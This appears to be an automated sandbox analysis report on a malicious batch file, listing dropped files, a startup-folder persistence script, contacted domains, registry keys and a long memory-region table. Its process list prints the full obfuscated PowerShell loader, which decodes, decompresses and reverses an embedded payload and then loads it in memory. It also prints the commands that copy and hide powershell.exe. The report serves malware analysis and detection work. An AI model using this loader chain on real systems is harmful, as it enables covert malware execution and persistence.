Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ilZhNx3JAc.bat
|
Unicode text, UTF-8 text, with very long lines (56593), with CRLF, CR line terminators
|
initial sample
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbgwakb1.vhj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pghh4m1g.n05.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5chgxg.tpq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\MustFlush.bat
|
Unicode text, UTF-8 text, with very long lines (56593), with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\MustFlush.bat:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo F "
|
||
C:\Windows\System32\attrib.exe
|
attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
|
||
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
|
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat'
| Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream(
, $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv,
([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd
= $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife
= $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod,
$null, $null, $null)| Out-Null"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo F "
|
||
C:\Windows\System32\attrib.exe
|
attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
|
||
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
|
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat'
| Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream(
, $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv,
([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd
= $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife
= $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod,
$null, $null, $null)| Out-Null"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\xcopy.exe
|
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\xcopy.exe
|
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
|
unknown
|
||
http://nffplp.com
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
http://ip-api.com/line/?fields=hosting-
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://ip-api.com/line/?fields=hosting1
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 18 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
nffplp.com
|
163.44.198.71
|
||
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
163.44.198.71
|
nffplp.com
|
Singapore
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2711000
|
trusted library allocation
|
page read and write
|
||
2C9E000
|
trusted library allocation
|
page read and write
|
||
8F39000
|
trusted library allocation
|
page read and write
|
||
5E54000
|
trusted library allocation
|
page read and write
|
||
65FE000
|
trusted library allocation
|
page read and write
|
||
26C1000
|
trusted library allocation
|
page read and write
|
||
4C96000
|
trusted library allocation
|
page read and write
|
||
4978000
|
trusted library allocation
|
page read and write
|
||
7A2000
|
remote allocation
|
page execute and read and write
|
||
2CC1000
|
trusted library allocation
|
page read and write
|
||
2C71000
|
trusted library allocation
|
page read and write
|
||
49CD000
|
trusted library allocation
|
page read and write
|
||
8AC0000
|
trusted library section
|
page read and write
|
||
4E44000
|
trusted library allocation
|
page read and write
|
||
5E02000
|
trusted library allocation
|
page read and write
|
||
26EE000
|
trusted library allocation
|
page read and write
|
||
8DD1000
|
trusted library allocation
|
page read and write
|
||
4FC3000
|
trusted library allocation
|
page read and write
|
||
1590000
|
heap
|
page read and write
|
||
4B9F000
|
trusted library allocation
|
page read and write
|
||
4A5C000
|
trusted library allocation
|
page read and write
|
||
25653555000
|
heap
|
page read and write
|
||
4A61000
|
trusted library allocation
|
page read and write
|
||
4EFE000
|
trusted library allocation
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
4C27000
|
trusted library allocation
|
page read and write
|
||
4A6D000
|
trusted library allocation
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
4A97000
|
trusted library allocation
|
page read and write
|
||
41A8000
|
heap
|
page read and write
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
2C9A000
|
trusted library allocation
|
page read and write
|
||
4B18000
|
trusted library allocation
|
page read and write
|
||
8810000
|
trusted library allocation
|
page execute and read and write
|
||
2CB1000
|
trusted library allocation
|
page read and write
|
||
4050000
|
trusted library section
|
page read and write
|
||
4DC3000
|
trusted library allocation
|
page read and write
|
||
4D3F000
|
trusted library allocation
|
page read and write
|
||
4D74000
|
trusted library allocation
|
page read and write
|
||
4F47000
|
trusted library allocation
|
page read and write
|
||
4F95000
|
trusted library allocation
|
page read and write
|
||
40D0000
|
heap
|
page readonly
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
4D50000
|
heap
|
page read and write
|
||
49FD000
|
trusted library allocation
|
page read and write
|
||
16CE000
|
stack
|
page read and write
|
||
36F9000
|
trusted library allocation
|
page read and write
|
||
4F4F000
|
trusted library allocation
|
page read and write
|
||
4B74000
|
trusted library allocation
|
page read and write
|
||
69DE000
|
stack
|
page read and write
|
||
7DDC000
|
heap
|
page read and write
|
||
7050000
|
trusted library allocation
|
page read and write
|
||
647E000
|
stack
|
page read and write
|
||
26EC000
|
trusted library allocation
|
page read and write
|
||
4D19000
|
trusted library allocation
|
page read and write
|
||
2CA4000
|
trusted library allocation
|
page read and write
|
||
4B9D000
|
trusted library allocation
|
page read and write
|
||
4E55000
|
trusted library allocation
|
page read and write
|
||
4690000
|
heap
|
page execute and read and write
|
||
6FCE000
|
stack
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
25E80854000
|
heap
|
page read and write
|
||
22526DC5000
|
heap
|
page read and write
|
||
D23000
|
trusted library allocation
|
page execute and read and write
|
||
4ED2000
|
trusted library allocation
|
page read and write
|
||
4A1A000
|
trusted library allocation
|
page read and write
|
||
B14000
|
trusted library allocation
|
page read and write
|
||
4B3E000
|
trusted library allocation
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
1378000
|
trusted library allocation
|
page read and write
|
||
229C74D0000
|
heap
|
page read and write
|
||
4B5B000
|
trusted library allocation
|
page read and write
|
||
5651000
|
trusted library allocation
|
page read and write
|
||
4AAC000
|
trusted library allocation
|
page read and write
|
||
8820000
|
trusted library allocation
|
page read and write
|
||
4B52000
|
trusted library allocation
|
page read and write
|
||
5AAE000
|
stack
|
page read and write
|
||
57FC000
|
trusted library allocation
|
page read and write
|
||
1430000
|
trusted library allocation
|
page read and write
|
||
46AA000
|
trusted library allocation
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
D70000
|
trusted library allocation
|
page read and write
|
||
6E55000
|
trusted library allocation
|
page read and write
|
||
7B30000
|
heap
|
page read and write
|
||
4C53000
|
trusted library allocation
|
page read and write
|
||
4D12000
|
trusted library allocation
|
page read and write
|
||
4DDA000
|
trusted library allocation
|
page read and write
|
||
4F27000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
stack
|
page read and write
|
||
52EE000
|
stack
|
page read and write
|
||
4BE9000
|
trusted library allocation
|
page read and write
|
||
167C000
|
stack
|
page read and write
|
||
4A40000
|
trusted library allocation
|
page read and write
|
||
4EF8000
|
trusted library allocation
|
page read and write
|
||
4D8B000
|
trusted library allocation
|
page read and write
|
||
4F6C000
|
trusted library allocation
|
page read and write
|
||
15BB000
|
trusted library allocation
|
page read and write
|
||
B45000
|
trusted library allocation
|
page execute and read and write
|
||
67EA000
|
stack
|
page read and write
|
||
16C000
|
stack
|
page read and write
|
||
4ECE000
|
trusted library allocation
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
AE1000
|
heap
|
page read and write
|
||
15CA000
|
trusted library allocation
|
page read and write
|
||
452C000
|
stack
|
page read and write
|
||
4A01000
|
trusted library allocation
|
page read and write
|
||
25E80690000
|
heap
|
page read and write
|
||
4B0B000
|
trusted library allocation
|
page read and write
|
||
4AC4000
|
trusted library allocation
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
7DD0000
|
heap
|
page read and write
|
||
4620000
|
heap
|
page read and write
|
||
4A4B000
|
trusted library allocation
|
page read and write
|
||
4A21000
|
trusted library allocation
|
page read and write
|
||
4F12000
|
trusted library allocation
|
page read and write
|
||
4AA5000
|
trusted library allocation
|
page read and write
|
||
5514000
|
trusted library allocation
|
page read and write
|
||
40EA000
|
trusted library allocation
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
8010000
|
trusted library allocation
|
page read and write
|
||
4D44000
|
trusted library allocation
|
page read and write
|
||
4A9F000
|
trusted library allocation
|
page read and write
|
||
4ED0000
|
trusted library allocation
|
page read and write
|
||
C11000
|
heap
|
page read and write
|
||
4A7C000
|
trusted library allocation
|
page read and write
|
||
41A0000
|
heap
|
page read and write
|
||
D20000
|
trusted library allocation
|
page read and write
|
||
4D1B000
|
trusted library allocation
|
page read and write
|
||
4BCE000
|
trusted library allocation
|
page read and write
|
||
4B78000
|
trusted library allocation
|
page read and write
|
||
1420000
|
trusted library allocation
|
page read and write
|
||
4CBD000
|
trusted library allocation
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
heap
|
page read and write
|
||
4AFA000
|
trusted library allocation
|
page read and write
|
||
695D000
|
stack
|
page read and write
|
||
4C89000
|
trusted library allocation
|
page read and write
|
||
24D2000
|
trusted library allocation
|
page read and write
|
||
6CD2000
|
heap
|
page read and write
|
||
4C85000
|
trusted library allocation
|
page read and write
|
||
4DC7000
|
trusted library allocation
|
page read and write
|
||
2089CBC0000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
5060000
|
heap
|
page read and write
|
||
25653598000
|
heap
|
page read and write
|
||
8040000
|
heap
|
page execute and read and write
|
||
6EE0000
|
trusted library allocation
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
4DF9000
|
trusted library allocation
|
page read and write
|
||
4A4E000
|
trusted library allocation
|
page read and write
|
||
4A99000
|
trusted library allocation
|
page read and write
|
||
4B1C000
|
trusted library allocation
|
page read and write
|
||
4BED000
|
trusted library allocation
|
page read and write
|
||
4073000
|
trusted library allocation
|
page execute and read and write
|
||
4F3A000
|
trusted library allocation
|
page read and write
|
||
4A45000
|
trusted library allocation
|
page read and write
|
||
4F28000
|
trusted library allocation
|
page read and write
|
||
8B99C7C000
|
stack
|
page read and write
|
||
4C72000
|
trusted library allocation
|
page read and write
|
||
4BBF000
|
trusted library allocation
|
page read and write
|
||
229C7567000
|
heap
|
page read and write
|
||
4BB3000
|
trusted library allocation
|
page read and write
|
||
657E000
|
stack
|
page read and write
|
||
254E000
|
stack
|
page read and write
|
||
2089CE65000
|
heap
|
page read and write
|
||
643E000
|
stack
|
page read and write
|
||
4F14000
|
trusted library allocation
|
page read and write
|
||
4FA6000
|
trusted library allocation
|
page read and write
|
||
4CFF000
|
trusted library allocation
|
page read and write
|
||
4B33000
|
trusted library allocation
|
page read and write
|
||
4B8B000
|
trusted library allocation
|
page read and write
|
||
4CCB000
|
trusted library allocation
|
page read and write
|
||
4DF3000
|
heap
|
page read and write
|
||
6230000
|
trusted library allocation
|
page execute and read and write
|
||
4E59000
|
trusted library allocation
|
page read and write
|
||
4CDE000
|
trusted library allocation
|
page read and write
|
||
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
5D1E000
|
stack
|
page read and write
|
||
2089CBF0000
|
heap
|
page read and write
|
||
6FEC000
|
trusted library allocation
|
page read and write
|
||
4AE2000
|
trusted library allocation
|
page read and write
|
||
7B30000
|
heap
|
page read and write
|
||
24E0000
|
trusted library allocation
|
page read and write
|
||
25E80697000
|
heap
|
page read and write
|
||
4E3E000
|
trusted library allocation
|
page read and write
|
||
AC7000
|
heap
|
page read and write
|
||
4F11000
|
trusted library allocation
|
page read and write
|
||
4651000
|
trusted library allocation
|
page read and write
|
||
4EE7000
|
trusted library allocation
|
page read and write
|
||
4D20000
|
heap
|
page execute and read and write
|
||
60C0000
|
heap
|
page read and write
|
||
5D10000
|
heap
|
page read and write
|
||
4D7C000
|
trusted library allocation
|
page read and write
|
||
4E51000
|
trusted library allocation
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
4B46000
|
trusted library allocation
|
page read and write
|
||
68DD000
|
stack
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
B5A000
|
heap
|
page read and write
|
||
4EB7000
|
trusted library allocation
|
page read and write
|
||
4B3C000
|
trusted library allocation
|
page read and write
|
||
4F78000
|
trusted library allocation
|
page read and write
|
||
4B14000
|
trusted library allocation
|
page read and write
|
||
B3A000
|
trusted library allocation
|
page execute and read and write
|
||
6FB0000
|
trusted library allocation
|
page execute and read and write
|
||
63DF000
|
trusted library allocation
|
page read and write
|
||
6E80000
|
trusted library allocation
|
page read and write
|
||
8070000
|
trusted library allocation
|
page read and write
|
||
617000
|
heap
|
page read and write
|
||
4D2C000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
4F54000
|
trusted library allocation
|
page read and write
|
||
4BC1000
|
trusted library allocation
|
page read and write
|
||
6DDE000
|
heap
|
page read and write
|
||
4F3E000
|
trusted library allocation
|
page read and write
|
||
7D9A000
|
heap
|
page read and write
|
||
6F30000
|
trusted library allocation
|
page read and write
|
||
2089CC02000
|
heap
|
page read and write
|
||
C03000
|
trusted library allocation
|
page execute and read and write
|
||
4E70000
|
trusted library allocation
|
page read and write
|
||
D42000
|
trusted library allocation
|
page read and write
|
||
82D0000
|
trusted library allocation
|
page read and write
|
||
D40000
|
trusted library allocation
|
page read and write
|
||
7030000
|
trusted library allocation
|
page read and write
|
||
4D27000
|
trusted library allocation
|
page read and write
|
||
4A33000
|
trusted library allocation
|
page read and write
|
||
25653540000
|
heap
|
page read and write
|
||
8B99D7E000
|
stack
|
page read and write
|
||
4B4E000
|
trusted library allocation
|
page read and write
|
||
270D000
|
trusted library allocation
|
page read and write
|
||
4CC6000
|
trusted library allocation
|
page read and write
|
||
AF2000
|
heap
|
page read and write
|
||
47F8000
|
trusted library allocation
|
page read and write
|
||
668E000
|
stack
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
4D17000
|
trusted library allocation
|
page read and write
|
||
7FFB1E866000
|
unkown
|
page readonly
|
||
6A20000
|
heap
|
page read and write
|
||
182E000
|
stack
|
page read and write
|
||
449C000
|
stack
|
page read and write
|
||
ADB47FD000
|
stack
|
page read and write
|
||
7FFB1E872000
|
unkown
|
page readonly
|
||
4F54000
|
trusted library allocation
|
page read and write
|
||
8BE0000
|
trusted library section
|
page read and write
|
||
4DF7000
|
trusted library allocation
|
page read and write
|
||
7DE4000
|
heap
|
page read and write
|
||
7DE000
|
remote allocation
|
page execute and read and write
|
||
64E5000
|
trusted library allocation
|
page read and write
|
||
4C87000
|
trusted library allocation
|
page read and write
|
||
2CCC000
|
trusted library allocation
|
page read and write
|
||
45CE000
|
stack
|
page read and write
|
||
52E000
|
stack
|
page read and write
|
||
6D6C000
|
heap
|
page read and write
|
||
40A2000
|
trusted library allocation
|
page read and write
|
||
66BE000
|
stack
|
page read and write
|
||
4A2B000
|
trusted library allocation
|
page read and write
|
||
4BB4000
|
trusted library allocation
|
page read and write
|
||
4F64000
|
trusted library allocation
|
page read and write
|
||
D3D000
|
trusted library allocation
|
page execute and read and write
|
||
5709000
|
trusted library allocation
|
page read and write
|
||
584E000
|
trusted library allocation
|
page read and write
|
||
4F8B000
|
trusted library allocation
|
page read and write
|
||
36B9000
|
trusted library allocation
|
page read and write
|
||
8000000
|
trusted library section
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
4B09000
|
trusted library allocation
|
page read and write
|
||
4F7A000
|
trusted library allocation
|
page read and write
|
||
4AEE000
|
trusted library allocation
|
page read and write
|
||
4B5D000
|
trusted library allocation
|
page read and write
|
||
4A7A000
|
trusted library allocation
|
page read and write
|
||
50CC000
|
stack
|
page read and write
|
||
4B2D000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
25E80570000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
4089000
|
trusted library allocation
|
page read and write
|
||
4B0E000
|
trusted library allocation
|
page read and write
|
||
4DBD000
|
trusted library allocation
|
page read and write
|
||
22526C30000
|
heap
|
page read and write
|
||
4B4A000
|
trusted library allocation
|
page read and write
|
||
4D19000
|
trusted library allocation
|
page read and write
|
||
4CDA000
|
trusted library allocation
|
page read and write
|
||
4EB3000
|
trusted library allocation
|
page read and write
|
||
8170000
|
trusted library allocation
|
page execute and read and write
|
||
4F8F000
|
trusted library allocation
|
page read and write
|
||
2089CC54000
|
heap
|
page read and write
|
||
15F6000
|
trusted library allocation
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page read and write
|
||
5EA0000
|
trusted library allocation
|
page read and write
|
||
768000
|
stack
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
7C0F000
|
stack
|
page read and write
|
||
4BBB000
|
trusted library allocation
|
page read and write
|
||
4A89000
|
trusted library allocation
|
page read and write
|
||
4A04000
|
trusted library allocation
|
page read and write
|
||
8A90000
|
trusted library allocation
|
page execute and read and write
|
||
8130000
|
heap
|
page read and write
|
||
C04000
|
trusted library allocation
|
page read and write
|
||
2089CE60000
|
heap
|
page read and write
|
||
682E000
|
stack
|
page read and write
|
||
4BAA000
|
trusted library allocation
|
page read and write
|
||
4BDC000
|
trusted library allocation
|
page read and write
|
||
1630000
|
heap
|
page read and write
|
||
6477000
|
trusted library allocation
|
page read and write
|
||
4ADA000
|
trusted library allocation
|
page read and write
|
||
4CB0000
|
trusted library allocation
|
page read and write
|
||
4BF1000
|
trusted library allocation
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
E91987C000
|
stack
|
page read and write
|
||
8910000
|
trusted library allocation
|
page execute and read and write
|
||
4AB8000
|
trusted library allocation
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
B1D000
|
trusted library allocation
|
page execute and read and write
|
||
4EB1000
|
trusted library allocation
|
page read and write
|
||
4D32000
|
trusted library allocation
|
page read and write
|
||
4D0C000
|
trusted library allocation
|
page read and write
|
||
D2E000
|
stack
|
page read and write
|
||
4BC1000
|
trusted library allocation
|
page read and write
|
||
4E57000
|
trusted library allocation
|
page read and write
|
||
A42000
|
unkown
|
page readonly
|
||
4B46000
|
trusted library allocation
|
page read and write
|
||
6D7B000
|
heap
|
page read and write
|
||
4B3A000
|
trusted library allocation
|
page read and write
|
||
4B12000
|
trusted library allocation
|
page read and write
|
||
5E93000
|
trusted library allocation
|
page read and write
|
||
4A1E000
|
trusted library allocation
|
page read and write
|
||
4EB9000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
trusted library allocation
|
page read and write
|
||
4B63000
|
trusted library allocation
|
page read and write
|
||
4EE9000
|
trusted library allocation
|
page read and write
|
||
4CB3000
|
trusted library allocation
|
page read and write
|
||
82C0000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
6450000
|
heap
|
page read and write
|
||
6FBAF000
|
unkown
|
page readonly
|
||
7E8000
|
stack
|
page read and write
|
||
C18000
|
trusted library allocation
|
page read and write
|
||
7D80000
|
heap
|
page read and write
|
||
4BFB000
|
trusted library allocation
|
page read and write
|
||
AEF000
|
heap
|
page read and write
|
||
627E000
|
stack
|
page read and write
|
||
ADB49FF000
|
stack
|
page read and write
|
||
6FB91000
|
unkown
|
page execute read
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
4CBB000
|
trusted library allocation
|
page read and write
|
||
8822000
|
trusted library allocation
|
page read and write
|
||
22526DC0000
|
heap
|
page read and write
|
||
4DFB000
|
trusted library allocation
|
page read and write
|
||
4A76000
|
trusted library allocation
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
6EC3000
|
heap
|
page read and write
|
||
4B1D000
|
trusted library allocation
|
page read and write
|
||
7020000
|
trusted library allocation
|
page read and write
|
||
4B07000
|
trusted library allocation
|
page read and write
|
||
56C9000
|
trusted library allocation
|
page read and write
|
||
15D6000
|
trusted library allocation
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
6BDE000
|
stack
|
page read and write
|
||
4D39000
|
trusted library allocation
|
page read and write
|
||
7B9000
|
heap
|
page read and write
|
||
ADB45FF000
|
stack
|
page read and write
|
||
6DD3000
|
heap
|
page read and write
|
||
679B000
|
stack
|
page read and write
|
||
6DB000
|
heap
|
page read and write
|
||
5F00000
|
trusted library allocation
|
page read and write
|
||
4AAD000
|
trusted library allocation
|
page read and write
|
||
4F76000
|
trusted library allocation
|
page read and write
|
||
2089CBA0000
|
heap
|
page read and write
|
||
4C6E000
|
trusted library allocation
|
page read and write
|
||
4D66000
|
trusted library allocation
|
page read and write
|
||
47A2000
|
trusted library allocation
|
page read and write
|
||
4A3A000
|
trusted library allocation
|
page read and write
|
||
4C96000
|
trusted library allocation
|
page read and write
|
||
4BA8000
|
trusted library allocation
|
page read and write
|
||
4A60000
|
trusted library allocation
|
page read and write
|
||
8B80000
|
trusted library allocation
|
page read and write
|
||
4DB9000
|
trusted library allocation
|
page read and write
|
||
4C19000
|
trusted library allocation
|
page read and write
|
||
ADB40FA000
|
stack
|
page read and write
|
||
5EB0000
|
trusted library allocation
|
page execute and read and write
|
||
4F23000
|
trusted library allocation
|
page read and write
|
||
4C64000
|
trusted library allocation
|
page read and write
|
||
4BB0000
|
trusted library allocation
|
page read and write
|
||
8250000
|
trusted library allocation
|
page execute and read and write
|
||
4F66000
|
trusted library allocation
|
page read and write
|
||
4EA4000
|
trusted library allocation
|
page read and write
|
||
25E806A2000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
4D07000
|
trusted library allocation
|
page read and write
|
||
5BD0000
|
heap
|
page read and write
|
||
4FC1000
|
trusted library allocation
|
page read and write
|
||
4D23000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
trusted library allocation
|
page read and write
|
||
6EA000
|
stack
|
page read and write
|
||
4DC9000
|
trusted library allocation
|
page read and write
|
||
4B31000
|
